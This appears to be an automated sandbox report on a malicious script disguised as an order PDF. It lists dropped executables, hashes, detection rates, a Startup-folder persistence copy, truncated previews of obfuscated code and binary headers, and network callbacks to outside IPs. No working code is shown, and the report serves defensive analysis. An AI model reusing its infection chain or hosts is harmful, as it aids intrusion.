SHA-512:	B9E9206F548AE1C9ED4BE86015CFAF65017CCE1C64F633557CA861D1570D8DACA3B9FC8515D83207370635E2D13D60004231B4C5AA5D3236C9C0CF21E53323EB
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	613184
Entropy (8bit):	7.954016806295198
Encrypted:	false
SSDEEP:	12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
MD5:	5ED905205AEB85AF64B2FF567A8CF838
SHA1:	8C8F1A28C100CCB9192DC496B61B978802907045
SHA-256:	1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
SHA-512:	7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:cc................."...:......v@... ...`....@.. ....................................`..................................@..W....................>..@....`......@................................................ ............... ..H............text...\| ... ...".................. ..`.reloc.......`.......$..............@..B.rsrc................&..............@..@................X@......H...........\V......R...\H..............................................0...........(......0..........+.&.+.&..(......0..........+.&.+.&...(.........0..........+.&.....0..........+.&.....0..........+.&.+.&..(....%&-?&.+[s...........,M.E.........-......&&s..........+,s ........+.&.+.s!.........+.s"........+....E......................................,.&.0..........+.&..~....o#...%&.+.....0..........+.&..~....o$...%&.+.....0..........+.&..~....o%...%&.+..*...0..........

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.839308921501875
Encrypted:	false
SSDEEP:	192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
MD5:	937C6E940577634844311E349BD4614D
SHA1:	379440E933201CD3E6E6BF9B0E61B7663693195F
SHA-256:	30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
SHA-512:	6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	15988
Entropy (8bit):	5.563006209243009
Encrypted:	false
SSDEEP:	384:Ote+X7cQCw5qXePt0cGp3e5SjnWl8HaZQRbpHcu5Yb:UdEGtR/oWl8HaZqNHGb
MD5:	63F7A25CAD5BC37BA07AAFD86658FCCF
SHA1:	C46CD4F320BCC66A04EE1F084B0660312AB4E6F7
SHA-256:	5FDF56517CFE33276FB178B0986447354C7909563F9B6B49DA7474DD2642F15E
SHA-512:	9FA2357E49FE7139C25E147248354D91CAB76C105FAE238524910828DFB90C6F070364EB49D3E899E025294916C218810FCA17B27ED62982F91E9D9842C58937
Malicious:	false
Preview:	@...e...........h.....................H.6............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	613184
Entropy (8bit):	7.954016806295198
Encrypted:	false
SSDEEP:	12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
MD5:	5ED905205AEB85AF64B2FF567A8CF838
SHA1:	8C8F1A28C100CCB9192DC496B61B978802907045
SHA-256:	1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
SHA-512:	7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:cc................."...:......v@... ...`....@.. ....................................`..................................@..W....................>..@....`......@................................................ ............... ..H............text...\| ... ...".................. ..`.reloc.......`.......$..............@..B.rsrc................&..............@..@................X@......H...........\V......R...\H..............................................0...........(......0..........+.&.+.&..(......0..........+.&.+.&...(.........0..........+.&.....0..........+.&.....0..........+.&.+.&..(....%&-?&.+[s...........,M.E.........-......&&s..........+,s ........+.&.+.s!.........+.s"........+....E......................................,.&.0..........+.&..~....o#...%&.+.....0..........+.&..~....o$...%&.+.....0..........+.&..~....o%...%&.+..*...0..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf32wont.1ox.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqrc4ufx.mh3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	613184
Entropy (8bit):	7.954016806295198
Encrypted:	false
SSDEEP:	12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
MD5:	5ED905205AEB85AF64B2FF567A8CF838
SHA1:	8C8F1A28C100CCB9192DC496B61B978802907045
SHA-256:	1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
SHA-512:	7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:cc................."...:......v@... ...`....@.. ....................................`..................................@..W....................>..@....`......@................................................ ............... ..H............text...\| ... ...".................. ..`.reloc.......`.......$..............@..B.rsrc................&..............@..@................X@......H...........\V......R...\H..............................................0...........(......0..........+.&.+.&..(......0..........+.&.+.&...(.........0..........+.&.....0..........+.&.....0..........+.&.+.&..(....%&-?&.+[s...........,M.E.........-......&&s..........+,s ........+.&.+.s!.........+.s"........+....E......................................,.&.0..........+.&..~....o#...%&.+.....0..........+.&..~....o$...%&.+.....0..........+.&..~....o%...%&.+..*...0..........

Static File Info

General

File type:	ASCII text, with very long lines (9438), with no line terminators
Entropy (8bit):	5.462386477884943
TrID:
File name:	Order Specifications PDF.js
File size:	9438
MD5:	2f2dd87407ef0c27a76906745df56ec0
SHA1:	cec4a6dd3d0fa67524e93b1f8906ff5c15bf7f22
SHA256:	c074cae77f4adf2af92380ce03345d6abaf16ea5442690f18574429ce2538958
SHA512:	fe87d253a7f45e900ce6f2b86969b1c59c08d1bcaccd124fe4680fd5745652e1d08a9c042fbb7d4aee6b876ce517b89d34df4a49db8c3b2ecbd96955132c1709
SSDEEP:	192:yh9hiKdKb+uMl1jK3LUGnsYP9jdv/0yzGtFcYOrKGLzYMhIduxznM+bHRHILRES:ycSKbuDjALfP1dv/0V2YOrKUsMWdyznE
TLSH:	CB12C46065D0A40203D31FA27B3EA0EAC96E5AAF3E775CCFA406BDD45D58912CED1B34
File Content Preview:	function _0x5099(_0x304024,_0x5125dd){var _0x3974d=_0x3974();return _0x5099=function(_0xe99d3f,_0x318392){_0xe99d3f=_0xe99d3f-0xc8;var _0x59ecb7=_0x3974d[_0xe99d3f];if(_0x5099['GLbovs']===undefined){var _0x12b176=function(_0x5c0ef3){var _0x14b3e9='abcdefg

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.68.8.8.858595532012811 11/03/22-23:35:55.641128	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	58595	53	192.168.2.6	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 23:35:55.699965000 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:55.700043917 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:55.700172901 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:55.707721949 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:55.707767963 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.087060928 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.087366104 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.349771976 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.349845886 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.350765944 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.350914955 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.354026079 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.354063034 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.531894922 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.531948090 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.531970024 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.532002926 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.532017946 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.532037973 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.708384991 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.708489895 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.708538055 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.708604097 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.885216951 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.885376930 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.885469913 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.885607004 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.885706902 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.885803938 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:56.885943890 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:56.886053085 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.063107967 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.063265085 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.063261032 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.063327074 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.063374996 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.063404083 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.063476086 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.063554049 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.063682079 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.063761950 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.063941002 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.064018965 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.064132929 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.064234018 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.064351082 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.064431906 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.064585924 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.064702988 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.241874933 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.242022991 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.242050886 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.242115021 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.242144108 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.242233992 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.242270947 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.242347956 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.242491007 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.242573023 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.242722988 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.242803097 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.242949963 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.243030071 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.243223906 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.243298054 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.243448973 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.243540049 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.243643999 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.243727922 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.243894100 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.243973017 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.244116068 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.244193077 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.244362116 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.244441032 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.421113968 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.421257019 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.421315908 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.421417952 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.421516895 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.421612978 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.421885967 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.421977997 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.422182083 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.422266960 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.422393084 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.422475100 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.422542095 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.422640085 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.422672033 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.422754049 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.422961950 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423085928 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.423103094 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423130989 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423177958 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.423208952 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.423237085 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423309088 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.423372984 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423465967 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.423499107 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423574924 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.423616886 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423702002 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.423746109 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423827887 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.423873901 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.423973083 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.424001932 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.424086094 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.424122095 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.424209118 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.424240112 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.424330950 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.784321070 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.784349918 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.784435987 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.784527063 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.784615993 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.784641027 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.784707069 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.784742117 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.784826994 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.784848928 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.784920931 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.784946918 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785048962 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785060883 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785088062 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785132885 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785147905 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785182953 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785258055 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785289049 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785361052 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785399914 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785492897 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785509109 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785599947 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785628080 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785706997 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785732985 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785897970 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.785901070 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.785923004 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786016941 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786067009 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786087990 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786104918 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786118984 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786134005 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786139965 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786180019 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786187887 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786206007 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786257029 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786278009 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786304951 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786390066 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786407948 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786494970 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786514997 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786619902 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786662102 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786736012 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786765099 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786870003 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.786904097 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786936045 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.786997080 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787010908 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787028074 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787045956 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787085056 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787127972 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787156105 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787236929 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787261963 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787343025 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787369013 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787445068 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787468910 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787547112 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787607908 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787682056 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787698984 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787750006 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.787798882 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.787851095 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.801227093 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.801275015 CET	443	49710	50.115.174.192	192.168.2.6
Nov 3, 2022 23:35:57.801289082 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:35:57.802061081 CET	49710	443	192.168.2.6	50.115.174.192
Nov 3, 2022 23:36:13.526469946 CET	49711	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:36:16.551876068 CET	49711	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:36:22.552428007 CET	49711	2404	192.168.2.6	51.75.209.245
Nov 3, 2022 23:36:35.572195053 CET	49712	2404	192.168.2.6	51.75.209.245
